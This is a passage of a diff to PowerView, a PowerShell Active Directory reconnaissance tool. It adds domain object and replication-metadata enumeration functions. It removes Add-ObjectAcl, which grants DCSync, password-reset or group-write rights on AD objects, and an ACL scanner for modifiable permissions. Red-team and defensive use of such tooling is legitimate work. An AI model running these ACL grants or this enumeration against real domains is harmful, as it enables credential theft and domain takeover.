+ $Filter += "(operatingsystemservicepack=$ServicePack)"
+ }
+ if ($PSBoundParameters['SiteName']) {
+ Write-Verbose "[Get-DomainComputer] Searching for computers with site name: $SiteName"
+ $Filter += "(serverreferencebl=$SiteName)"
+ }
+ if ($PSBoundParameters['LDAPFilter']) {
+ Write-Verbose "[Get-DomainComputer] Using additional LDAP filter: $LDAPFilter"
+ $Filter += "$LDAPFilter"
+ }
+ # build the LDAP filter for the dynamic UAC filter value
+ $UACFilter | Where-Object {$_} | ForEach-Object {
+ if ($_ -match 'NOT_.*') {
+ $UACField = $_.Substring(4)
+ $UACValue = [Int]($UACEnum::$UACField)
+ $Filter += "(!(userAccountControl:1.2.840.113556.1.4.803:=$UACValue))"
+ }
+ else {
+ $UACValue = [Int]($UACEnum::$_)
+ $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=$UACValue)"
+ }
}
-
- try {
- $Results = $Searcher.FindAll()
- $Results | Where-Object {$_} | ForEach-Object {
- $Object = [adsi]($_.path)
- if($Object.distinguishedname) {
- $Access = $Object.PsBase.ObjectSecurity.access
- $Access | ForEach-Object {
- $_ | Add-Member NoteProperty 'ObjectDN' $Object.distinguishedname[0]
+ $CompSearcher.filter = "(&(samAccountType=805306369)$Filter)"
+ Write-Verbose "[Get-DomainComputer] Get-DomainComputer filter string: $($CompSearcher.filter)"
- if($Object.objectsid[0]){
- $S = (New-Object System.Security.Principal.SecurityIdentifier($Object.objectsid[0],0)).Value
- }
- else {
- $S = $Null
- }
-
- $_ | Add-Member NoteProperty 'ObjectSID' $S
- $_
- }
- }
- } | ForEach-Object {
- if($RightsFilter) {
- $GuidFilter = Switch ($RightsFilter) {
- "ResetPassword" { "00299570-246d-11d0-a768-00aa006e0529" }
- "WriteMembers" { "bf9679c0-0de6-11d0-a285-00aa003049e2" }
- Default { "00000000-0000-0000-0000-000000000000"}
- }
- if($_.ObjectType -eq $GuidFilter) { $_ }
+ if ($PSBoundParameters['FindOne']) { $Results = $CompSearcher.FindOne() }
+ else { $Results = $CompSearcher.FindAll() }
+ $Results | Where-Object {$_} | ForEach-Object {
+ $Up = $True
+ if ($PSBoundParameters['Ping']) {
+ $Up = Test-Connection -Count 1 -Quiet -ComputerName $_.properties.dnshostname
+ }
+ if ($Up) {
+ if ($PSBoundParameters['Raw']) {
+ # return raw result objects
+ $Computer = $_
+ $Computer.PSObject.TypeNames.Insert(0, 'PowerView.Computer.Raw')
}
else {
- $_
+ $Computer = Convert-LDAPProperty -Properties $_.Properties
+ $Computer.PSObject.TypeNames.Insert(0, 'PowerView.Computer')
}
- } | ForEach-Object {
- if($GUIDs) {
- # if we're resolving GUIDs, map them them to the resolved hash table
- $AclProperties = @{}
- $_.psobject.properties | ForEach-Object {
- if( ($_.Name -eq 'ObjectType') -or ($_.Name -eq 'InheritedObjectType') ) {
- try {
- $AclProperties[$_.Name] = $GUIDS[$_.Value.toString()]
- }
- catch {
- $AclProperties[$_.Name] = $_.Value
- }
- }
- else {
- $AclProperties[$_.Name] = $_.Value
- }
- }
- New-Object -TypeName PSObject -Property $AclProperties
- }
- else { $_ }
+ $Computer
}
- $Results.dispose()
- $Searcher.dispose()
}
- catch {
- Write-Warning $_
+ if ($Results) {
+ try { $Results.dispose() }
+ catch {
+ Write-Verbose "[Get-DomainComputer] Error disposing of the Results object: $_"
+ }
}
+ $CompSearcher.dispose()
}
}
}
-function Add-ObjectAcl {
+function Get-DomainObject {
<#
- .SYNOPSIS
+.SYNOPSIS
- Adds an ACL for a specific active directory object.
-
- AdminSDHolder ACL approach from Sean Metcalf (@pyrotek3)
- https://adsecurity.org/?p=1906
+Return all (or specified) domain objects in AD.
- ACE setting method adapted from https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects.
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-ADName
- 'ResetPassword' doesn't need to know the user's current password
- 'WriteMembers' allows for the modification of group membership
+.DESCRIPTION
- .PARAMETER TargetSamAccountName
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria. To only return specific properties, use
+"-Properties samaccountname,usnchanged,...". By default, all objects for
+the current domain are returned.
- Target object name to filter for.
+.PARAMETER Identity
- .PARAMETER TargetName
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
- Target object name to filter for.
+.PARAMETER UACFilter
- .PARAMETER TargetDistinguishedName
+Dynamic parameter that accepts one or more values from $UACEnum, including
+"NOT_X" negation forms. To see all possible values, run '0|ConvertFrom-UACValue -ShowAll'.
- Target object distinguished name to filter for.
+.PARAMETER Domain
- .PARAMETER TargetFilter
+Specifies the domain to use for the query, defaults to the current domain.
- A customized ldap filter string to use to find a target, e.g. "(description=*admin*)"
+.PARAMETER LDAPFilter
- .PARAMETER TargetADSpath
+Specifies an LDAP query string that is used to filter Active Directory objects.
- The LDAP source for the target, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+.PARAMETER Properties
- .PARAMETER TargetADSprefix
+Specifies the properties of the output object to retrieve from the server.
- Prefix to set for the target searcher (like "CN=Sites,CN=Configuration")
+.PARAMETER SearchBase
- .PARAMETER PrincipalSID
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
- The SID of the principal object to add for access.
+.PARAMETER Server
- .PARAMETER PrincipalName
+Specifies an Active Directory server (domain controller) to bind to.
- The name of the principal object to add for access.
+.PARAMETER SearchScope
- .PARAMETER PrincipalSamAccountName
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- The samAccountName of the principal object to add for access.
+.PARAMETER ResultPageSize
- .PARAMETER Rights
+Specifies the PageSize to set for the LDAP searcher object.
- Rights to add for the principal, "All","ResetPassword","WriteMembers","DCSync"
+.PARAMETER ServerTimeLimit
- .PARAMETER Domain
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- The domain to use for the target query, defaults to the current domain.
+.PARAMETER SecurityMasks
- .PARAMETER DomainController
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
- Domain controller to reflect LDAP queries through.
+.PARAMETER Tombstone
- .PARAMETER PageSize
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- The PageSize to set for the LDAP searcher object.
+.PARAMETER FindOne
- .EXAMPLE
+Only return one result object.
- Add-ObjectAcl -TargetSamAccountName matt -PrincipalSamAccountName john
+.PARAMETER Credential
- Grants 'john' all full access rights to the 'matt' account.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- .EXAMPLE
+.PARAMETER Raw
- Add-ObjectAcl -TargetSamAccountName matt -PrincipalSamAccountName john -Rights ResetPassword
+Switch. Return raw results instead of translating the fields into a custom PSObject.
- Grants 'john' the right to reset the password for the 'matt' account.
+.EXAMPLE
- .LINK
+Get-DomainObject -Domain testlab.local
- https://adsecurity.org/?p=1906
-
- https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell
-#>
+Return all objects for the testlab.local domain
- [CmdletBinding()]
- Param (
- [String]
- $TargetSamAccountName,
+.EXAMPLE
- [String]
- $TargetName = "*",
+'S-1-5-21-890171859-3433809279-3366196753-1003', 'CN=dfm,CN=Users,DC=testlab,DC=local','b6a9a2fb-bbd5-4f28-9a09-23213cea6693','dfm.a' | Get-DomainObject -Properties distinguishedname
- [Alias('DN')]
- [String]
- $TargetDistinguishedName = "*",
+distinguishedname
+-----------------
+CN=PRIMARY,OU=Domain Controllers,DC=testlab,DC=local
+CN=dfm,CN=Users,DC=testlab,DC=local
+OU=OU3,DC=testlab,DC=local
+CN=dfm (admin),CN=Users,DC=testlab,DC=local
- [String]
- $TargetFilter,
+.EXAMPLE
- [String]
- $TargetADSpath,
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainObject -Credential $Cred -Identity 'windows1'
- [String]
- $TargetADSprefix,
+.EXAMPLE
- [String]
- [ValidatePattern('^S-1-5-21-[0-9]+-[0-9]+-[0-9]+-[0-9]+')]
- $PrincipalSID,
+Get-Domain | Select-Object -Expand name
+testlab.local
- [String]
- $PrincipalName,
+'testlab\harmj0y','DEV\Domain Admins' | Get-DomainObject -Verbose -Properties distinguishedname
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainUser] Extracted domain 'testlab.local' from 'testlab\harmj0y'
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(samAccountName=harmj0y)))
+
+distinguishedname
+-----------------
+CN=harmj0y,CN=Users,DC=testlab,DC=local
+VERBOSE: [Get-DomainUser] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins'
+VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local
+VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(samAccountName=Domain Admins)))
+CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local
+
+.OUTPUTS
+
+PowerView.ADObject
+
+Custom PSObject with translated AD object property fields.
+
+PowerView.ADObject.Raw
+
+The raw DirectoryServices.SearchResult object, if -Raw is enabled.
+#>
+
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+ [OutputType('PowerView.ADObject')]
+ [OutputType('PowerView.ADObject.Raw')]
+ [CmdletBinding()]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
+ [String[]]
+ $Identity,
+ [ValidateNotNullOrEmpty()]
[String]
- $PrincipalSamAccountName,
+ $Domain,
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
[String]
- [ValidateSet("All","ResetPassword","WriteMembers","DCSync")]
- $Rights = "All",
+ $LDAPFilter,
+
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Properties,
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
[String]
- $RightsGUID,
+ $SearchBase,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
[String]
- $Domain,
+ $Server,
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
- $DomainController,
+ $SearchScope = 'Subtree',
- [ValidateRange(1,10000)]
+ [ValidateRange(1, 10000)]
[Int]
- $PageSize = 200
- )
-
- begin {
- $Searcher = Get-DomainSearcher -Domain $Domain -DomainController $DomainController -ADSpath $TargetADSpath -ADSprefix $TargetADSprefix -PageSize $PageSize
+ $ResultPageSize = 200,
- if($PrincipalSID) {
- $ResolvedPrincipalSID = $PrincipalSID
- }
- else {
- $Principal = Get-ADObject -Domain $Domain -DomainController $DomainController -Name $PrincipalName -SamAccountName $PrincipalSamAccountName -PageSize $PageSize
-
- if(!$Principal) {
- throw "Error resolving principal"
- }
- $ResolvedPrincipalSID = $Principal.objectsid
- }
- if(!$ResolvedPrincipalSID) {
- throw "Error resolving principal"
- }
- }
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
- process {
+ [ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
+ [String]
+ $SecurityMasks,
- if ($Searcher) {
+ [Switch]
+ $Tombstone,
- if($TargetSamAccountName) {
- $Searcher.filter="(&(samaccountname=$TargetSamAccountName)(name=$TargetName)(distinguishedname=$TargetDistinguishedName)$TargetFilter)"
- }
- else {
- $Searcher.filter="(&(name=$TargetName)(distinguishedname=$TargetDistinguishedName)$TargetFilter)"
- }
-
- try {
- $Results = $Searcher.FindAll()
- $Results | Where-Object {$_} | ForEach-Object {
+ [Alias('ReturnOne')]
+ [Switch]
+ $FindOne,
- # adapted from https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
- $TargetDN = $_.Properties.distinguishedname
+ [Switch]
+ $Raw
+ )
- $Identity = [System.Security.Principal.IdentityReference] ([System.Security.Principal.SecurityIdentifier]$ResolvedPrincipalSID)
- $InheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None"
- $ControlType = [System.Security.AccessControl.AccessControlType] "Allow"
- $ACEs = @()
+ DynamicParam {
+ $UACValueNames = [Enum]::GetNames($UACEnum)
+ # add in the negations
+ $UACValueNames = $UACValueNames | ForEach-Object {$_; "NOT_$_"}
+ # create new dynamic parameter
+ New-DynamicParameter -Name UACFilter -ValidateSet $UACValueNames -Type ([array])
+ }
- if($RightsGUID) {
- $GUIDs = @($RightsGUID)
- }
- else {
- $GUIDs = Switch ($Rights) {
- # ResetPassword doesn't need to know the user's current password
- "ResetPassword" { "00299570-246d-11d0-a768-00aa006e0529" }
- # allows for the modification of group membership
- "WriteMembers" { "bf9679c0-0de6-11d0-a285-00aa003049e2" }
- # 'DS-Replication-Get-Changes' = 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
- # 'DS-Replication-Get-Changes-All' = 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
- # 'DS-Replication-Get-Changes-In-Filtered-Set' = 89e95b76-444d-4c62-991a-0facbeda640c
- # when applied to a domain's ACL, allows for the use of DCSync
- "DCSync" { "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2", "89e95b76-444d-4c62-991a-0facbeda640c"}
- }
- }
+ BEGIN {
+ $SearcherArguments = @{}
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+ $ObjectSearcher = Get-DomainSearcher @SearcherArguments
+ }
- if($GUIDs) {
- foreach($GUID in $GUIDs) {
- $NewGUID = New-Object Guid $GUID
- $ADRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight"
- $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity,$ADRights,$ControlType,$NewGUID,$InheritanceType
+ PROCESS {
+ #bind dynamic parameter to a friendly variable
+ if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) {
+ New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters
+ }
+ if ($ObjectSearcher) {
+ $IdentityFilter = ''
+ $Filter = ''
+ $Identity | Where-Object {$_} | ForEach-Object {
+ $IdentityInstance = $_.Replace('(', '\28').Replace(')', '\29')
+ if ($IdentityInstance -match '^S-1-') {
+ $IdentityFilter += "(objectsid=$IdentityInstance)"
+ }
+ elseif ($IdentityInstance -match '^(CN|OU|DC)=') {
+ $IdentityFilter += "(distinguishedname=$IdentityInstance)"
+ if ((-not $PSBoundParameters['Domain']) -and (-not $PSBoundParameters['SearchBase'])) {
+ # if a -Domain isn't explicitly set, extract the object domain out of the distinguishedname
+ # and rebuild the domain searcher
+ $IdentityDomain = $IdentityInstance.SubString($IdentityInstance.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
+ Write-Verbose "[Get-DomainObject] Extracted domain '$IdentityDomain' from '$IdentityInstance'"
+ $SearcherArguments['Domain'] = $IdentityDomain
+ $ObjectSearcher = Get-DomainSearcher @SearcherArguments
+ if (-not $ObjectSearcher) {
+ Write-Warning "[Get-DomainObject] Unable to retrieve domain searcher for '$IdentityDomain'"
}
}
- else {
- # deault to GenericAll rights
- $ADRights = [System.DirectoryServices.ActiveDirectoryRights] "GenericAll"
- $ACEs += New-Object System.DirectoryServices.ActiveDirectoryAccessRule $Identity,$ADRights,$ControlType,$InheritanceType
+ }
+ elseif ($IdentityInstance -imatch '^[0-9A-F]{8}-([0-9A-F]{4}-){3}[0-9A-F]{12}$') {
+ $GuidByteString = (([Guid]$IdentityInstance).ToByteArray() | ForEach-Object { '\' + $_.ToString('X2') }) -join ''
+ $IdentityFilter += "(objectguid=$GuidByteString)"
+ }
+ elseif ($IdentityInstance.Contains('\')) {
+ $ConvertedIdentityInstance = $IdentityInstance.Replace('\28', '(').Replace('\29', ')') | Convert-ADName -OutputType Canonical
+ if ($ConvertedIdentityInstance) {
+ $ObjectDomain = $ConvertedIdentityInstance.SubString(0, $ConvertedIdentityInstance.IndexOf('/'))
+ $ObjectName = $IdentityInstance.Split('\')[1]
+ $IdentityFilter += "(samAccountName=$ObjectName)"
+ $SearcherArguments['Domain'] = $ObjectDomain
+ Write-Verbose "[Get-DomainObject] Extracted domain '$ObjectDomain' from '$IdentityInstance'"
+ $ObjectSearcher = Get-DomainSearcher @SearcherArguments
}
+ }
+ elseif ($IdentityInstance.Contains('.')) {
+ $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(dnshostname=$IdentityInstance))"
+ }
+ else {
+ $IdentityFilter += "(|(samAccountName=$IdentityInstance)(name=$IdentityInstance)(displayname=$IdentityInstance))"
+ }
+ }
+ if ($IdentityFilter -and ($IdentityFilter.Trim() -ne '') ) {
+ $Filter += "(|$IdentityFilter)"
+ }
- Write-Verbose "Granting principal $ResolvedPrincipalSID '$Rights' on $($_.Properties.distinguishedname)"
+ if ($PSBoundParameters['LDAPFilter']) {
+ Write-Verbose "[Get-DomainObject] Using additional LDAP filter: $LDAPFilter"
+ $Filter += "$LDAPFilter"
+ }
- try {
- # add all the new ACEs to the specified object
- ForEach ($ACE in $ACEs) {
- Write-Verbose "Granting principal $ResolvedPrincipalSID '$($ACE.ObjectType)' rights on $($_.Properties.distinguishedname)"
- $Object = [adsi]($_.path)
- $Object.PsBase.ObjectSecurity.AddAccessRule($ACE)
- $Object.PsBase.commitchanges()
- }
- }
- catch {
- Write-Warning "Error granting principal $ResolvedPrincipalSID '$Rights' on $TargetDN : $_"
- }
+ # build the LDAP filter for the dynamic UAC filter value
+ $UACFilter | Where-Object {$_} | ForEach-Object {
+ if ($_ -match 'NOT_.*') {
+ $UACField = $_.Substring(4)
+ $UACValue = [Int]($UACEnum::$UACField)
+ $Filter += "(!(userAccountControl:1.2.840.113556.1.4.803:=$UACValue))"
+ }
+ else {
+ $UACValue = [Int]($UACEnum::$_)
+ $Filter += "(userAccountControl:1.2.840.113556.1.4.803:=$UACValue)"
}
- $Results.dispose()
- $Searcher.dispose()
}
- catch {
- Write-Warning "Error: $_"
+
+ if ($Filter -and $Filter -ne '') {
+ $ObjectSearcher.filter = "(&$Filter)"
+ }
+ Write-Verbose "[Get-DomainObject] Get-DomainObject filter string: $($ObjectSearcher.filter)"
+
+ if ($PSBoundParameters['FindOne']) { $Results = $ObjectSearcher.FindOne() }
+ else { $Results = $ObjectSearcher.FindAll() }
+ $Results | Where-Object {$_} | ForEach-Object {
+ if ($PSBoundParameters['Raw']) {
+ # return raw result objects
+ $Object = $_
+ $Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject.Raw')
+ }
+ else {
+ $Object = Convert-LDAPProperty -Properties $_.Properties
+ $Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject')
+ }
+ $Object
+ }
+ if ($Results) {
+ try { $Results.dispose() }
+ catch {
+ Write-Verbose "[Get-DomainObject] Error disposing of the Results object: $_"
+ }
}
+ $ObjectSearcher.dispose()
}
}
}
-function Invoke-ACLScanner {
+function Get-DomainObjectAttributeHistory {
<#
- .SYNOPSIS
- Searches for ACLs for specifable AD objects (default to all domain objects)
- with a domain sid of > -1000, and have modifiable rights.
+.SYNOPSIS
+
+Returns the Active Directory attribute replication metadata for the specified
+object, i.e. a parsed version of the msds-replattributemetadata attribute.
+By default, replication data for every domain object is returned.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObject
+
+.DESCRIPTION
+
+Wraps Get-DomainObject with a specification to retrieve the property 'msds-replattributemetadata'.
+This is the domain attribute replication metadata associated with the object. The results are
+parsed from their XML string form and returned as a custom object.
+
+.PARAMETER Identity
+
+A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
+Wildcards accepted.
+
+.PARAMETER Domain
+
+Specifies the domain to use for the query, defaults to the current domain.
+
+.PARAMETER LDAPFilter
+
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+.PARAMETER Properties
- Thanks Sean Metcalf (@pyrotek3) for the idea and guidance.
+Only return replication metadata on the specified property names.
- .PARAMETER SamAccountName
+.PARAMETER SearchBase
- Object name to filter for.
+The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
- .PARAMETER Name
+.PARAMETER Server
- Object name to filter for.
+Specifies an Active Directory server (domain controller) to bind to.
- .PARAMETER DistinguishedName
+.PARAMETER SearchScope
- Object distinguished name to filter for.
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
- .PARAMETER Filter
+.PARAMETER ResultPageSize
- A customized ldap filter string to use, e.g. "(description=*admin*)"
-
- .PARAMETER ADSpath
+Specifies the PageSize to set for the LDAP searcher object.
- The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
+.PARAMETER ServerTimeLimit
- .PARAMETER ADSprefix
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- Prefix to set for the searcher (like "CN=Sites,CN=Configuration")
+.PARAMETER Tombstone
- .PARAMETER Domain
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- The domain to use for the query, defaults to the current domain.
+.PARAMETER Credential
- .PARAMETER DomainController
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain.
- Domain controller to reflect LDAP queries through.
+.EXAMPLE
- .PARAMETER ResolveGUIDs
+Get-DomainObjectAttributeHistory -Domain testlab.local
- Switch. Resolve GUIDs to their display names.
+Return all attribute replication metadata for all objects in the testlab.local domain.
- .PARAMETER PageSize
+.EXAMPLE
- The PageSize to set for the LDAP searcher object.
+'S-1-5-21-883232822-274137685-4173207997-1109','CN=dfm.a,CN=Users,DC=testlab,DC=local','da','94299db1-e3e7-48f9-845b-3bffef8bedbb' | Get-DomainObjectAttributeHistory -Properties objectClass | ft
- .EXAMPLE
+ObjectDN ObjectGuid AttributeNam LastOriginat Version LastOriginat
+ e ingChange ingDsaDN
+-------- ---------- ------------ ------------ ------- ------------
+CN=dfm.a,C... a6263874-f... objectClass 2017-03-0... 1 CN=NTDS S...
+CN=DA,CN=U... 77b56df4-f... objectClass 2017-04-1... 1 CN=NTDS S...
+CN=harmj0y... 94299db1-e... objectClass 2017-03-0... 1 CN=NTDS S...
- PS C:\> Invoke-ACLScanner -ResolveGUIDs | Export-CSV -NoTypeInformation acls.csv
+.EXAMPLE
- Enumerate all modifable ACLs in the current domain, resolving GUIDs to display
- names, and export everything to a .csv
+Get-DomainObjectAttributeHistory harmj0y -Properties userAccountControl
+
+ObjectDN : CN=harmj0y,CN=Users,DC=testlab,DC=local
+ObjectGuid : 94299db1-e3e7-48f9-845b-3bffef8bedbb
+AttributeName : userAccountControl
+LastOriginatingChange : 2017-03-07T19:56:27Z
+Version : 4
+LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First
+ -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca
+ l
+
+.OUTPUTS
+
+PowerView.ADObjectAttributeHistory
+
+Custom PSObject with translated replication metadata fields.
+
+.LINK
+
+https://blogs.technet.microsoft.com/pie/2014/08/25/metadata-1-when-did-the-delegation-change-how-to-track-security-descriptor-modifications/
#>
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
+ [OutputType('PowerView.ADObjectAttributeHistory')]
[CmdletBinding()]
- Param (
- [Parameter(ValueFromPipeline=$True)]
- [String]
- $SamAccountName,
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
+ [String[]]
+ $Identity,
+ [ValidateNotNullOrEmpty()]
[String]
- $Name = "*",
+ $Domain,
- [Alias('DN')]
+ [ValidateNotNullOrEmpty()]
+ [Alias('Filter')]
[String]
- $DistinguishedName = "*",
+ $LDAPFilter,
- [String]
- $Filter,
+ [ValidateNotNullOrEmpty()]
+ [String[]]
+ $Properties,
+ [ValidateNotNullOrEmpty()]
+ [Alias('ADSPath')]
[String]
- $ADSpath,
+ $SearchBase,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
[String]
- $ADSprefix,
+ $Server,
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
- $Domain,
+ $SearchScope = 'Subtree',
- [String]
- $DomainController,
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
+
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
[Switch]
- $ResolveGUIDs,
+ $Tombstone,
- [ValidateRange(1,10000)]
- [Int]
- $PageSize = 200
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
+
+ [Switch]
+ $Raw
)
- # Get all domain ACLs with the appropriate parameters
- Get-ObjectACL @PSBoundParameters | ForEach-Object {
- # add in the translated SID for the object identity
- $_ | Add-Member Noteproperty 'IdentitySID' ($_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value)
- $_
- } | Where-Object {
- # check for any ACLs with SIDs > -1000
- try {
- # TODO: change this to a regex for speedup?
- [int]($_.IdentitySid.split("-")[-1]) -ge 1000
+ BEGIN {
+ $SearcherArguments = @{
+ 'Properties' = 'msds-replattributemetadata','distinguishedname'
+ 'Raw' = $True
+ }
+ if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }
+ if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
+ if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['FindOne']) { $SearcherArguments['FindOne'] = $FindOne }
+ if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
+
+ if ($PSBoundParameters['Properties']) {
+ $PropertyFilter = $PSBoundParameters['Properties'] -Join '|'
+ }
+ else {
+ $PropertyFilter = ''
+ }
+ }
+
+ PROCESS {
+ if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity }
+
+ Get-DomainObject @SearcherArguments | ForEach-Object {
+ $ObjectDN = $_.Properties['distinguishedname'][0]
+ ForEach($XMLNode in $_.Properties['msds-replattributemetadata']) {
+ $TempObject = [xml]$XMLNode | Select-Object -ExpandProperty 'DS_REPL_ATTR_META_DATA' -ErrorAction SilentlyContinue
+ if ($TempObject) {
+ if ($TempObject.pszAttributeName -Match $PropertyFilter) {
+ $Output = New-Object PSObject
+ $Output | Add-Member NoteProperty 'ObjectDN' $ObjectDN
+ $Output | Add-Member NoteProperty 'AttributeName' $TempObject.pszAttributeName
+ $Output | Add-Member NoteProperty 'LastOriginatingChange' $TempObject.ftimeLastOriginatingChange
+ $Output | Add-Member NoteProperty 'Version' $TempObject.dwVersion
+ $Output | Add-Member NoteProperty 'LastOriginatingDsaDN' $TempObject.pszLastOriginatingDsaDN
+ $Output.PSObject.TypeNames.Insert(0, 'PowerView.ADObjectAttributeHistory')
+ $Output
+ }
+ }
+ else {
+ Write-Verbose "[Get-DomainObjectAttributeHistory] Error retrieving 'msds-replattributemetadata' for '$ObjectDN'"
+ }
+ }
}
- catch {}
